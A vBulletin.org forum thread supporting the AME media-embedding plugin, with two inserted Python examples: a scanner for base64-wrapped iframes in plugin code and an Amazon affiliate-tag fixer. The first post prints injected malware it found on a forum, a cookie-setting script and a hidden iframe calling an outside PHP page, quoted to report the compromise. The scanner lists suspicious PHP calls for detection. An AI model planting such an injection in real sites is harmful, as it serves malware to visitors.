Major Additions - AME 2.5 - Media Embedding for posts, sigs, vm's, groups and blogs (https://vborg.vbsupport.ru/showthread.php?t=202476)

ShackMaster 10-30-2010 02:39 PM

BEWARE OF THIS PLUGIN! We believe we had a vulnerability using the AME (Auto Media Embedder) product/plugin and have removed the plugin. We are actually certain this was the culprit now that it has been removed and the malicious code is no longer a problem. Here is the malicious code it was injecting:

Code:

<script>
function SetCookie(cookieName,cookieContent){
  var cookiePath = '/';
  var expDate=new Date();
  expDate.setTime(expDate.getTime()+372800000);
  var expires=expDate.toGMTString();
  document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
}
SetCookie("hsmsdn", "turk");
</script>
<iframe name="1" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://www.chekolkal.co.cc/felk.php"></iframe>


Of course we got several warnings from Google, which was blocking some of our pages due to the malicious code.

We tried to convert the AME code back to normal URLs prior to removing the product, but it would not work. We have removed it, but now those posts have the [ame] tags wrapped around a media link and we would like to remove them and not have to do it manually.

Is there an SQL query we can run that will remove all instances of [ame] and [/ame]?

Thanks!

creativepart 10-30-2010 08:39 PM

Looks sort of like the VBSEO injection exploit that simply placed the malicious code in the first Mod in your list and AME would generally be one of the first. That's what the exploit does -- it puts a base64 iframe in a plugin for one of the first mods on your mod list.

On my forum it placed the malware code in an All-Advertising mod plugin -- but it wasn't the mod's fault.

Are you running VBSEO and have you upgraded the files to prevent the exploit?
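
Added example (not part of the original thread, and not vBulletin, vBSEO or AME code): a small Python check for the kind of tampering described above, where a plugin's PHP code gains a base64-wrapped iframe. It assumes plugin rows have been exported as dicts with `product`, `title`, `hookname` and `phpcode` keys (an assumed export layout); the sample rows are constructed and point at a reserved `.invalid` host.

```python
import base64
import re

# PHP calls commonly used to unpack and run or emit a hidden payload.
SUSPICIOUS_CALLS = re.compile(r"\b(base64_decode|eval|gzinflate|str_rot13)\s*\(", re.I)
# Markup that has no business inside a plugin's PHP code.
HTML_MARKERS = re.compile(r"<\s*(?:iframe|script)\b", re.I)
# Quoted string literals that look like base64 (24+ characters).
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{24,}={0,2})['\"]")

def decode_literals(phpcode):
    """Decode every base64-looking string literal found in phpcode."""
    decoded = []
    for literal in B64_LITERAL.findall(phpcode):
        try:
            raw = base64.b64decode(literal, validate=True)
        except ValueError:  # binascii.Error is a ValueError: not valid base64
            continue
        decoded.append(raw.decode("latin-1"))
    return decoded

def scan_plugin(row):
    """Return the list of findings for one plugin row."""
    code = row["phpcode"]
    findings = []
    calls = sorted({name.lower() for name in SUSPICIOUS_CALLS.findall(code)})
    if calls:
        findings.append("calls: " + ", ".join(calls))
    if HTML_MARKERS.search(code):
        findings.append("inline iframe/script markup")
    if any(HTML_MARKERS.search(text) for text in decode_literals(code)):
        findings.append("base64 literal decodes to iframe/script markup")
    return findings

def scan_all(rows):
    """Map 'product / title @ hook' to findings for every flagged row."""
    report = {}
    for row in rows:
        findings = scan_plugin(row)
        if findings:
            report[f"{row['product']} / {row['title']} @ {row['hookname']}"] = findings
    return report

# Constructed sample rows (hypothetical products and titles).
_PAYLOAD = base64.b64encode(
    b'<iframe src="http://example.invalid/x.php" width="1" height="1"></iframe>'
).decode()
SAMPLE_ROWS = [
    {"product": "demo_a", "title": "Clean plugin", "hookname": "global_start",
     "phpcode": "$show['demo'] = true;"},
    {"product": "demo_b", "title": "Tampered plugin", "hookname": "global_start",
     "phpcode": "$show['demo'] = true;\necho base64_decode('" + _PAYLOAD + "');"},
    {"product": "demo_c", "title": "Inline iframe", "hookname": "parse_templates",
     "phpcode": "$footer .= '<iframe src=\"http://example.invalid/\"></iframe>';"},
]
```

A hit only means the row deserves a manual look: some legitimate plugins call `eval` or `base64_decode`, so compare flagged code against the product's original XML before deleting anything.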

creativepart 10-30-2010 08:47 PM

I recently ran a "rebuild post cache" maintenance routine and it disabled most if not all old YouTube vid links in AME. If I click on the post's edit button and then save it puts the vid back in the post. Otherwise it's just missing.

I know there are some tools, but I'm not sure which one to run to re-apply the mod to my existing posts. And, the warnings there kind of scared me off just giving it a try to see what happens.

Could you scale that learning curve for me and let me know which tool to use and how to apply it?

PS. I'm using VB 3.7.3 and AME 2.5.6 and the stock YouTube definition and nothing else.

carsafety 10-30-2010 09:58 PM

Hi-

Does anyone have a working Amazon affiliate definition? Amazon must have changed their format a while back, as my previous definition seems hit or miss lately. Thanks!

BirdOPrey5 10-30-2010 11:24 PM

I'm using this but it's pretty standard I think.

Regular Expression:
Code:

http://www\.amazon\.[a-z\.]*/[\w%-]*/[\w]+/([\w]+).*
Replacement:

Code:

<a href="$ameinfo[url]?tag=joesultofftop-20" target="_blank" title="$ameinfo[url]"><img src="images/misc/amazon_icon.gif" border="0" alt="$ameinfo[title]" />$ameinfo[title]</a>
Replace my affiliate code (in red) with your own.

ShackMaster 10-31-2010 12:37 AM

Quote:

Originally Posted by creativepart (Post 2116159)
Looks sort of like the VBSEO injection exploit that simply placed the malicious code in the first Mod in your list and AME would generally be one of the first. That's what the exploit does -- it puts a base64 iframe in a plugin for one of the first mods on your mod list.

On my forum it placed the malware code in an All-Advertising mod plugin -- but it wasn't the mod's fault.

Are you running VBSEO and have you upgraded the files to prevent the exploit?

We do have one plugin ahead of where AME would be, but it is an Admin plugin, so there may have not been access available.

Yes... we have updated vBSEO to the latest version... immediately after we first got hit.

Will it now move to the next plugin on the list? Any idea what we need to install to block it?

carsafety 10-31-2010 02:13 PM

Quote:

Originally Posted by BirdOPrey5 (Post 2116214)
I'm using this but it's pretty standard I think.

Yeah it looks like that's the same one I have, but it seems to fail far more often than in the past and I haven't figured out why yet. I guess I need to take some time to look at Amazon links and understand how the replacement definitions work. Granted, I've been meaning to do that for most of the year and was hoping someone had done the work for me lol.

Thanks for taking the time to post what you had though I greatly appreciate it!

ShackMaster 11-01-2010 02:01 PM

Quote:

Originally Posted by creativepart (Post 2116159)
Looks sort of like the VBSEO injection exploit that simply placed the malicious code in the first Mod in your list and AME would generally be one of the first. That's what the exploit does -- it puts a base64 iframe in a plugin for one of the first mods on your mod list.

On my forum it placed the malware code in an All-Advertising mod plugin -- but it wasn't the mod's fault.

Are you running VBSEO and have you upgraded the files to prevent the exploit?

I opened a ticket with vBulletin and here is their response:

We're not aware of any vulnerability within vBulletin 3.8.6 for this however any issue with a plugin will relate specifically to their code. vBulletin just gives the code a 'hook' to attach to and allow it to run during a particular process - we do nothing specifically with a plugin's code.

Exactly what I suspected... neither party wants to accept responsibility or apparently even investigate if they have a security issue.

legatw 11-04-2010 03:50 PM

This modification increases the load on the server?

BirdOPrey5 11-04-2010 03:53 PM

All mods increase the load on the server but in the scheme of things not all that much.

legatw 11-04-2010 04:15 PM

on forum add a lot of youtube videos is to use this mod, or make better use of bbcode?

BirdOPrey5 11-04-2010 07:10 PM

I couldn't imagine there would be much of a difference between this mod and a bb code- both are using search and replace algorithms.

legatw 11-04-2010 07:52 PM

BirdOPrey5, thanks

thompson 11-05-2010 01:58 PM

does this work with 4.08 ?

BirdOPrey5 11-05-2010 02:51 PM

No, there was a 4.0 version released by someone else but I think I read it stopped working several 4.0.x versions back.

thompson 11-05-2010 03:35 PM

thanks. this is not good for me. :-(

Black Tiger 11-05-2010 04:58 PM

Can you help me too please?

I've got a problem with youtube.
I suddenly only see an icon with the link behind it, but film won't embed.

When I try to embed this link for example:
http://www.youtube.com/watch?v=dGtk1dHLSKM

It will look like:
[icon here] YouTube - Johnny Winter playing Red House in 1991

When I put my mouse over it, it says:
External Embedding not Available.

How can I fix this? I already tried reinstalling the product and also deleting all definitions and importing new ones.
And the Validation Regex box is empty!
When I disable extraction globally and edit/save a post, the videos become embedded double with some strange text between them. When enabling extracting globally, only icons with links remain. This goes for ALL youtube videos.

I'm using VBulletin 3.8.5. and Ame 2.5.

This question is also in the DJ's AME definitions thread, but I think it should be here in this thread, correct?

MjrNuT 11-09-2010 02:43 PM

My own question regarding self hosted video (i.e., wmv) on what folks may be doing here in conjunction with AME.

Currently, I have a /videos directory for which I upload such files. Then use the AME internal linking to present. Recommendations on implementing access to non-admins? Just create an FTP account for that folder only? Is there a hack (e.g., downloadsII) that could be mated in combination for a non-admin (general ugroup)?

Thanks for any ideas, recommendations, and direction!

IRANCITY 11-20-2010 01:48 PM

sry when it come for vb 4.0.8 ?

y2krazy 11-24-2010 01:17 PM

1 Attachment(s)
Is there a way to "cutoff" the container title text after, let's say 50 characters?

If it is longer than 60 characters on my style, it goes to a 2nd line and due to my images used, they are not multiple line friendly. Please let me know if there's a way to "cutoff" text and add something like "..." to the end to show there is more to the title. Thanks!

EDIT: Examples attached. One with a "normal" title. One with a "2-line" title.

nektar 11-25-2010 07:25 AM

Hi everyone.

I'm having a javascript error in internet explorer 8 at this line.

PHP Code:

<!-- / icons and login code -->

<script type="text/javascript">ame_toggle_view({,other 'true',post 'true',blog 'true',group 'true',vm 'true',sig 'true'});</script>

The product works fine but I hate to see javascript errors in explorer status bar.

Are you guys having the same problem? I'm running 3.8.5 and the latest ame 2.5.6

Edit:

If I disable this plugin the error goes away.

PHP Code:

AME Permission  Hide 

Does anyone know what this plugin does?

BirdOPrey5 11-25-2010 12:05 PM

I'm pretty sure that plugin "Hides" (or disables) AME for usergroups who aren't allowed to use it- if for some reason you disabled it for some users. I know one site for example where they disable it for guests.

BirdOPrey5 11-29-2010 11:17 PM

I wonder if it would be possible to make a definition that would work for any web site and pull the "title" of the site and put it as the link, so instead of:
https://vborg.vbsupport.ru/index.php
you'd get
vBulletin.org Forum

Otherwise is there some way to make this work nicely with this existing mod?
https://vborg.vbsupport.ru/showthread.php?t=189658

It works but the titles on youtube videos become full URLs instead of titles with both mods enabled.

carsafety 12-01-2010 11:46 PM

Quote:

Originally Posted by BirdOPrey5 (Post 2116214)
I'm using this but it's pretty standard I think.

Regular Expression:
Code:

http://www\.amazon\.[a-z\.]*/[\w%-]*/[\w]+/([\w]+).*
Replacement:

Code:

<a href="$ameinfo[url]?tag=joesultofftop-20" target="_blank" title="$ameinfo[url]"><img src="images/misc/amazon_icon.gif" border="0" alt="$ameinfo[title]" />$ameinfo[title]</a>
Replace my affiliate code (in red) with your own.

Okay I think I have found the problem. If you take a shortened Amazon link, like those you get from a Google search, it works just fine. The syntax is usually http://www.amazon.com/product-name-here/dp/JDISHIOEHO and AME turns it into http://www.amazon.com/product-name-h...filiatecode-20 . This validates using Amazon link checker just fine.

The problem arises if you use a longer Amazon link, like the ones you get when you search for an item at Amazon.com. These URLs already have a question mark in them, like ?ie=UTF8&blahblah . If you copy that, the AME appends ?tag=youraffiliatecode-20 to the end of the URL. This will not validate using the Amazon link checker, presumably because two question marks appear in the URL.

You can make it validate by appending &tag=youraffiliatecode-20 to the end of the URL instead. The problem is this syntax will not validate with the shorter URL format you might copy off Google.

All is fine if you are the only one putting Amazon links on your forum, but of course you want it to automatically append the right tag for whatever type of Amazon link a user might post.

Anyone handy with definitions have an idea on how to use ?tag= for shorter Amazon links and &tag= for the longer types that have a ? in the URL already? Maybe two separate ones?

One possible idea is that you append this to the end of any url ?tag=youraffiliatecode-20&tag=youraffiliatecode-20 . This seems like it works in limited testing, but I'm not all that familiar with AME definitions and Amazon URL formats to say for sure. Sometimes redundancy is good, sometimes it is not...
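
Added example (not part of the original thread and not an AME definition, which is only a regular expression plus a replacement template): the `?tag=` versus `&tag=` choice described above, worked through in Python by parsing the query string instead of appending text. The regular expression is the one posted earlier in the thread; the function name and sample URLs are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# The definition's regular expression as posted in this thread.
AMAZON_RE = re.compile(r"http://www\.amazon\.[a-z\.]*/[\w%-]*/[\w]+/([\w]+).*")


def add_affiliate_tag(url, tag):
    """Return url with exactly one tag=<tag> parameter, or None if the URL
    is not an Amazon product link according to AMAZON_RE."""
    if not AMAZON_RE.match(url):
        return None
    parts = urlsplit(url)
    # Keep the link's own parameters, drop any tag that is already present.
    params = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
              if k != "tag"]
    params.append(("tag", tag))
    # urlunsplit writes a single "?" before the query and keeps any #fragment.
    return urlunsplit(parts._replace(query=urlencode(params)))


# Constructed inputs modelled on the two link shapes described above.
SHORT = "http://www.amazon.com/product-name-here/dp/JDISHIOEHO"
LONG = SHORT + "?ie=UTF8&qid=123"

if __name__ == "__main__":
    for link in (SHORT, LONG, LONG + "&tag=other-20#reviews"):
        print(add_affiliate_tag(link, "youraffiliatecode-20"))
```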

BirdOPrey5 12-02-2010 12:48 AM

If what you say is true I would make the replacement link always have an ?= even if it's a dummy value it should just be ignored, ?dummy=5... then the &tag=affiliatecode should always work. I don't know if this would pass the amazon link checker but it should work in practice.

Digital Jedi 12-02-2010 08:08 PM

A number of these previous questions, which I would specify if I had a little more time today, are somewhat rectified if you use the up-to-date definitions in the add-on thread. The default definitions for AME have not been valid or updated in quite some time. I try my best to keep mine up to date, even though that's tough in all cases.

Digital Jedi 12-02-2010 08:10 PM

Quote:

Originally Posted by legatw (Post 2117945)
on forum add a lot of youtube videos is to use this mod, or make better use of bbcode?

Quote:

Originally Posted by BirdOPrey5 (Post 2118014)
I couldn't imagine there would be much of a difference between this mod and a bb code- both are using search and replace algorithms.

I wanted to comment on this one real quick. Actually, yes, there's a big difference. BBCode uses more resources when a page is generated than AME does. This is explained somewhat in the description, but simplistically, this is less server intensive.

carsafety 12-02-2010 11:27 PM

Quote:

Originally Posted by BirdOPrey5 (Post 2128188)
If what you say is true I would make the replacement link always have an ?= even if it's a dummy value it should just be ignored, ?dummy=5... then the &tag=affiliatecode should always work. I don't know if this would pass the amazon link checker but it should work in practice.

From my testing today, the combined tag I posted works best. It validated in every case that I tried, including some links that get passed to the redirected mobile Amazon site on phones. That's not conclusive, but so far, so good.

Quote:

Originally Posted by Digital Jedi (Post 2128533)
A number of these previous questions, which I would specify if I had a little more time today, are somewhat rectified if you use the up-to-date definitions in the add-on thread. The default definitions for AME have not been valid or updated in quite some time. I try my best to keep mine up to date, even though that's tough in all cases.

I think the definition BirdOfPrey posted back a page or two was the one from your definitions and it was far superior to the default one if I recall correctly (thanks!). Of course, if you updated it recently, perhaps your most current one solves the issue another way?

lafsunlmtd 12-03-2010 01:26 PM

This worked for me for a while and now has stopped working? I'm using 2.5.6

Edit: I cleared cache and now it works

Digital Jedi 12-03-2010 03:07 PM

Quote:

Originally Posted by carsafety (Post 2128611)
From my testing today, the combined tag I posted works best. It validated in every case that I tried, including some links that get passed to the redirected mobile Amazon site on phones. That's not conclusive, but so far, so good.



I think the definition BirdOfPrey posted back a page or two was the one from your definitions and it was far superior to the default one if I recall correctly (thanks!). Of course, if you updated it recently, perhaps your most current one solves the issue another way?


Any issues with that, please direct towards my thread and I'll try to address them.

Digital Jedi 12-03-2010 03:27 PM

Okay, I'm referring to this post in the AME 3 thread by The Geek. For a while now I've wanted to delve into an existing product to assist in my own personal studies of PHP and vB mod development. But I need a good reason to spend that time on it. I was going to ask The Geek first, but wasn't sure I could get in contact with him now that he's no longer involved in vBulletin coding. But it seems he's left the code open for anyone to try and continue development. To keep AME alive. I wish to do that. I wish to keep AME going for the foreseeable future. So while I can't guarantee a timeline, I am going to try and do my own second generation release of the AME code to try and keep this great product alive. I need to spend some time reviewing the code, understanding the fundamentals. But I intend to try to keep this product from fading away. Don't know if that will include vB4 development, at least not at first, but I will look into it. Hope you can bear with me.

Black Tiger 12-03-2010 03:34 PM

I think it's great you want to take it over and keep it alive.

My compliments already!

schlottkej 12-06-2010 02:15 PM

3 cheers for DJ!

dieselpowered 12-07-2010 02:28 AM

Hey everyone, I would like to change the color of the title on the container. What would be the best way to do that? I see it uses the tcat class, however, black on black is a little hard to read, lol. Not sure why it is not taking the text color of the tcat in the css settings?

Thanks in advance!

Digital Jedi 12-07-2010 01:04 PM

Quote:

Originally Posted by dieselpowered (Post 2130296)
Hey everyone, I would like to change the color of the title on the container. What would be the best way to do that? I see it uses the tcat class, however, black on black is a little hard to read, lol. Not sure why it is not taking the text color of the tcat in the css settings?

Thanks in advance!

It should look just like your category headers, but it's possible you have something overriding the text of the div that contains posts. Try adding a style="color:color name/#number" to that table cell in the container template and see if it changes anything.

zeus_r6 12-09-2010 01:10 PM

Is there a way to disable embedding on a specific style?

Digital Jedi 12-09-2010 03:02 PM

Quote:

Originally Posted by zeus_r6 (Post 2131297)
Is there a way to disable embedding on a specific style?

Oh, I see you found it. I recommend not bumping 2.0 thread again. Can cause a few folks to download the wrong version.

Check the add-on for my AME Templates for Mobile Skin. That should do what you're wanting.

zeus_r6 12-09-2010 04:41 PM

Thanks so much!

mmllc 12-10-2010 03:45 AM

This doesn't work so swell for me :(

Digital Jedi 12-10-2010 03:55 PM

Quote:

Originally Posted by mmllc (Post 2131726)
This doesn't work so swell for me :(

What seems to be the problem? Remember that the default definitions here don't work anymore. You'd need to get the up to date definitions from my thread.

